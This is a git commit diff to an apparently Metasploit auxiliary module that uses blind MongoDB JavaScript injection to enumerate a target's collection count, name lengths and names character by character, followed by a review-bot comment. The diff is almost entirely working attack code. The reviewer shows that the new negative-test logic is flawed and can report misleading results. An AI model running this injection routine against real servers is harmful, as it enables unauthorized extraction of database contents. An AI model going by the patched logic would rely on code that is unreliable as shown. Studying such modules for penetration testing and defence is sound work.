Update mongodb_js_inject_collection_enum.rb
This adds a bit more error handling and better decision-making with regard to false responses.
unstable
parent
4071fb332b
commit
2663af986b
|
@ -47,6 +47,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', '')
|
'uri' => uri.sub('[NoSQLi]', '')
|
||||||
})
|
})
|
||||||
|
|
||||||
|
if !res
|
||||||
|
fail_with("Server did not respond in an expected way.")
|
||||||
|
end
|
||||||
|
|
||||||
pay = ""
|
pay = ""
|
||||||
fals = res.body
|
fals = res.body
|
||||||
tru = nil
|
tru = nil
|
||||||
|
@ -57,14 +61,27 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', payload[0])
|
'uri' => uri.sub('[NoSQLi]', payload[0])
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body != fals and res.code == 200
|
if res and res.body != fals and res.code == 200
|
||||||
print_status("Looks like " + payload[0] + " works")
|
print_status("Looks like " + payload[0] + " works")
|
||||||
tru = res.body
|
tru = res.body
|
||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
|
||||||
|
})
|
||||||
|
|
||||||
|
if res and res.body != tru and res.code == 200
|
||||||
|
vprint_status("I think I confirmed with a negative test.")
|
||||||
|
fals = res.body
|
||||||
pay = payload[1]
|
pay = payload[1]
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if pay == ''
|
||||||
|
fail_with("Couldn't detect a payload, maybe it isn't injectable.")
|
||||||
|
end
|
||||||
|
|
||||||
length = 0
|
length = 0
|
||||||
vprint_status("Getting length of the number of collections.")
|
vprint_status("Getting length of the number of collections.")
|
||||||
(0..100).each do |len|
|
(0..100).each do |len|
|
||||||
|
@ -73,7 +90,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
length = len
|
length = len
|
||||||
print_status("#{len} collections are available")
|
print_status("#{len} collections are available")
|
||||||
break
|
break
|
||||||
|
@ -92,7 +109,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
name_len = k
|
name_len = k
|
||||||
print_status("Length of collection #{i}'s name is #{k}")
|
print_status("Length of collection #{i}'s name is #{k}")
|
||||||
break
|
break
|
||||||
|
@ -109,7 +126,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
|
||||||
})
|
})
|
||||||
|
|
||||||
if res.body == tru
|
if res and res.body == tru
|
||||||
name << c
|
name << c
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
|
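Review bot: The negative test added in the second hunk runs even when the positive check just above it failed, because the added `end` appears to close that `if` before the second `send_request_cgi`. In that case `tru` is still `nil` (or left over from an earlier payload), so `res.body != tru` holds for any 200 response and the module settles on `pay = payload[1]` without a confirmed true/false pair; the later `res.body == tru` comparisons then never match and the run reports a misleading result. Replacing the first `if … end` with a guard such as `next unless res and res.body != fals and res.code == 200` ahead of the `print_status` and `tru = res.body` lines would keep the confirmation tied to a successful positive test; the enclosing payload loop starts outside the hunk, so check that `next` fits it. Separately, both new `fail_with` calls pass only a message, while the framework's `fail_with` takes a failure reason first as far as I know, e.g. `fail_with(Failure::Unknown, "Server did not respond in an expected way.")`.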